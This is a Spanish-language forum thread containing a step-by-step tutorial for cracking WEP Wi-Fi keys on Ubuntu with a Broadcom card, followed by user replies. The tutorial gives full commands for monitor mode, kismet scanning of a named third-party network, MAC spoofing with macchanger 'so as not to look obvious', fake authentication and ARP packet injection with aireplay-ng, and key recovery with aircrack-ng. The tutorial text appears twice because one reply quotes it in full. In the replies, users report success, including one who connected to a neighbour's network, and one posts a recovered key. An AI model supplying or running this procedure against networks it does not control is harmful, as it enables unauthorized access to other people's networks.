How-to : Broadcom y Aircrack-ng

asknet

Bovino Milenario
#1
Bueno aqui les dejo este tuto haber si a mas de uno le es util. Les mostrare como en pokos y sencillos comandos puedes realizar auditoria wireless y obtener una clave wep usando tu broadcom en ubuntu 8.10.

Para tener modo monitor en tu broadcom pasate por este tuto y despues continua leyendo.

http://www.ba-k.com/showthread.php?t=367310 :histerica:

Si ya lo tienes comenzemos.

1 Poner en modo monitor la tarjeta.

sudo airmon-ng start wlan0 (donde wlan0 es mi interfaz)



Ahora puede ver que se crea la interfaz mon0 y es con la que vamos a trabajar.

2 Ahora instala kismet con el siguiente comando
sudo apt-get install kismet
y correlo con este otro
sudo kismet -c bcm43xx,mon0,b43

donde bcm43xx es la tarjeta, mon0 la interfaz y b43 el driver

te aparecera algo como esto.



Ahora teclea <space> , s y luego b , te dara acceso a la lista de la redes que tienes disponibles.Elige una y teclea i en este ejemplo es RELOJERIA.



apunta el ESSID, BSSID y el canal.

Ahora que tienes esta info importante acerca de la red. teclea lo siguiente.

sudo rmmod b43
sudo modprobe b43
sudo airmon-ng start wlan0 c

donde c es el canal en donde transmite la red. Ahora estas en modo monitor sobre el canal de la red que quieres obtener lo cual es mejor.

3 (opcional) Como buena practica de seguridad cambia tu mac para que no te veas muy obio con Macchanger.

sudo apt-get install macchanger
luego
sudo ifconfig mon0 down
sudo macchanger -r mon0
sudo ifconfig mon0 up


y apunta tu Fake Mac.

4 Ahora que tienes tu Fake Mac y los datos de la red hagamoslo.

sudo airodump-ng --w capturas -c N mon0

N = canal de la red que antes apuntaste
capturas = nombre del archivo donde guardaras los paquetes

y te debe salir algo como lo siguiente.



Observa la columna Data en este ejemplo esta en 0 lo cual es que no hay mucha actividad en la red, entonces tenemos que inyectar paquetes.

5 Necesitamos asociarnos en la red por lo cual tecleamos.

aireplay-ng -1 N -e ESSID -a BSSID -h TUMAC mon0

1 = el tipo de ataque de autentificacion
N = canal de la red que ya apuntaste
ESSID = nombre de la red
BSSID = mac de la red
TUMAC = tu fake mac o tu mac real segun sea el caso
mon0 = interfaz en monitor



listo estamos asociados.

6 Ahora es necesaria inyectar los paquetes

aireplay-ng -3 -b BSSID -h TUMAC mon0

3 = ataque de inyeccion
ESSID = nombre de la red
BSSID = mac de la red
TUMAC = tu fake mac o tu mac real segun sea el caso



Nota como se capturan los ARP , cheke de nuevo la pantalla donde estaba la columna data y observa como ahora el numero aumenta.



Ya solo es cuestion de esperar un rato a que se capturen los paquetes, yo por lo general espero a tener unos 50000 en la columna data pero pues depende de la red la cantidad necesaria.

7 Ahora obten la clave wep ingresando al directorio en donde esta el archivo capturas por medio de la consola y teclea.

sudo aircrack-ng capturas.cap

te saldra algo asi , elige del menu la red que de tu interes.



entonces empesara a obtener la clave wep y cuando este lista wow a disfrutar.



sudo airmon-ng stop wlan0

Ojo . no olvides detener el modo monitor y dejar tu tarjeta trabajando normal





Bueno espero les sea util :vientos: y pues se me hace un buen aporte a la comunidad bakuna, lo hize con el fin educativo no por enseñarles a hacer maldades bueno cada kien su conciencia :histerica:. Tambien espero haber redactado de una manera clara, y no haberme ekivokado en la sintaxis de los comandos, cualquier duda pregunten.

Saludos a todos. :vientos: :vientos: :vientos:
 

HeidemaR

Bovino maduro
#5
Grandioso aporte, en la noche que llegue a mi casa, probare, oye, pero crees que funcione con Ubuntu 8.04 ya que no he actualizado mi lap a 8.10??
Saludos :aplausos:
 

darinel8

Bovino adicto
#6
como ingreso la contraseña para conectarme a la red.

hice todo y al final obtengo la clave


Código:
Attack will be restarted every 5000 captured ivs.
Starting PTW attack with 182074 ivs.
                         KEY FOUND! [ [COLOR=Red]64:29:17:17:08[/COLOR] ] 
    Decrypted correctly: 100%
pero al momento de ingresarlo no me deja entrar



:(

:llorar:
 

kalsidon

Bovino maduro
#7
como ingreso la contraseña para conectarme a la red.

hice todo y al final obtengo la clave


Código:
Attack will be restarted every 5000 captured ivs.
Starting PTW attack with 182074 ivs.
                         KEY FOUND! [ [COLOR=Red]64:29:17:17:08[/COLOR] ] 
    Decrypted correctly: 100%
pero al momento de ingresarlo no me deja entrar



:(

:llorar:
se pone sin los ":" solo los numeros hexadecimales.
 

tuxguy89

Bovino maduro
#10
Bueno el tuto bro, deberias de checar Backtrack, yo lo use para hacer exactamente eso hace mucho tiempo. Una distro interesante basada en Slackware :)

saludos
 

HeidemaR

Bovino maduro
#12
Muchisimas gracias hermano, estoy actualmente conectado a la red de mi vecino de enfrente(que es mi amigo jajaja).
100 % funcional y a la primera, sin problema alguno
En serio muchisimas gracias:aplausos::histerica::vientos:
 

richichiiii

Bovino adolescente
#13
q onda gracias, pero a mi no me jala, hize todo lo del tutorial, pero sin borrar el controlador que ya tenia (porq no se como eliminarlo) y todo bien hasta q le doy en poner en modo monitor.... si me lo pone en modo monitor (porq incluso puedo sniffear redes con wireshark), peeeero, no me crea la interfaz mon0..... cuando le pongo el comando para ponerlo en modo monitor solo me aparece (monitor mode enabled)... y ya y pues no se q hacer porq no puedo avanzar
 

kmysamaX

Bovino adicto
#14
Yo me eh quedado con las ganas de hacerlo, tengo una Broadcom en mi lap, pero segun lo que eh estado leyendo en una pagina de compatibilidad, mi chipset de la inalambrica es justo el que no jala (de 2 de la broad com :¬¬:

Lastima, suerte a todos XD
 

edwinhuevo

Bovino adolescente
#18
muy bueno yo lo probe personalmente y si funciona perfectamente
jaja
solo solo lo usare para fines educativosssssssssssssssssssssss educativos
educativos
educativos
 
#20
Bueno aqui les dejo este tuto haber si a mas de uno le es util. Les mostrare como en pokos y sencillos comandos puedes realizar auditoria wireless y obtener una clave wep usando tu broadcom en ubuntu 8.10.

Para tener modo monitor en tu broadcom pasate por este tuto y despues continua leyendo.

http://www.ba-k.com/showthread.php?t=367310 :histerica:

Si ya lo tienes comenzemos.

1 Poner en modo monitor la tarjeta.

sudo airmon-ng start wlan0 (donde wlan0 es mi interfaz)



Ahora puede ver que se crea la interfaz mon0 y es con la que vamos a trabajar.

2 Ahora instala kismet con el siguiente comando
sudo apt-get install kismet
y correlo con este otro
sudo kismet -c bcm43xx,mon0,b43

donde bcm43xx es la tarjeta, mon0 la interfaz y b43 el driver

te aparecera algo como esto.



Ahora teclea <space> , s y luego b , te dara acceso a la lista de la redes que tienes disponibles.Elige una y teclea i en este ejemplo es RELOJERIA.



apunta el ESSID, BSSID y el canal.

Ahora que tienes esta info importante acerca de la red. teclea lo siguiente.

sudo rmmod b43
sudo modprobe b43
sudo airmon-ng start wlan0 c

donde c es el canal en donde transmite la red. Ahora estas en modo monitor sobre el canal de la red que quieres obtener lo cual es mejor.

3 (opcional) Como buena practica de seguridad cambia tu mac para que no te veas muy obio con Macchanger.

sudo apt-get install macchanger
luego
sudo ifconfig mon0 down
sudo macchanger -r mon0
sudo ifconfig mon0 up


y apunta tu Fake Mac.

4 Ahora que tienes tu Fake Mac y los datos de la red hagamoslo.

sudo airodump-ng --w capturas -c N mon0

N = canal de la red que antes apuntaste
capturas = nombre del archivo donde guardaras los paquetes

y te debe salir algo como lo siguiente.



Observa la columna Data en este ejemplo esta en 0 lo cual es que no hay mucha actividad en la red, entonces tenemos que inyectar paquetes.

5 Necesitamos asociarnos en la red por lo cual tecleamos.

aireplay-ng -1 N -e ESSID -a BSSID -h TUMAC mon0

1 = el tipo de ataque de autentificacion
N = canal de la red que ya apuntaste
ESSID = nombre de la red
BSSID = mac de la red
TUMAC = tu fake mac o tu mac real segun sea el caso
mon0 = interfaz en monitor



listo estamos asociados.

6 Ahora es necesaria inyectar los paquetes

aireplay-ng -3 -b BSSID -h TUMAC mon0

3 = ataque de inyeccion
ESSID = nombre de la red
BSSID = mac de la red
TUMAC = tu fake mac o tu mac real segun sea el caso



Nota como se capturan los ARP , cheke de nuevo la pantalla donde estaba la columna data y observa como ahora el numero aumenta.



Ya solo es cuestion de esperar un rato a que se capturen los paquetes, yo por lo general espero a tener unos 50000 en la columna data pero pues depende de la red la cantidad necesaria.

7 Ahora obten la clave wep ingresando al directorio en donde esta el archivo capturas por medio de la consola y teclea.

sudo aircrack-ng capturas.cap

te saldra algo asi , elige del menu la red que de tu interes.



entonces empesara a obtener la clave wep y cuando este lista wow a disfrutar.



sudo airmon-ng stop wlan0

Ojo . no olvides detener el modo monitor y dejar tu tarjeta trabajando normal





Bueno espero les sea util :vientos: y pues se me hace un buen aporte a la comunidad bakuna, lo hize con el fin educativo no por enseñarles a hacer maldades bueno cada kien su conciencia :histerica:. Tambien espero haber redactado de una manera clara, y no haberme ekivokado en la sintaxis de los comandos, cualquier duda pregunten.

Saludos a todos. :vientos: :vientos: :vientos:
oye compa la neta es lo mejor que puedes encontrar en la red:metal:, si funciona pero tengo una duda hay algunas redes en las cuales me permite asociarme pero no me da ningun arp y no me inyecta solo lee lo acks pero no me da arp si me ayudas te agradweceria mucho atte isma20003:vientos::metal::metal:
 
Arriba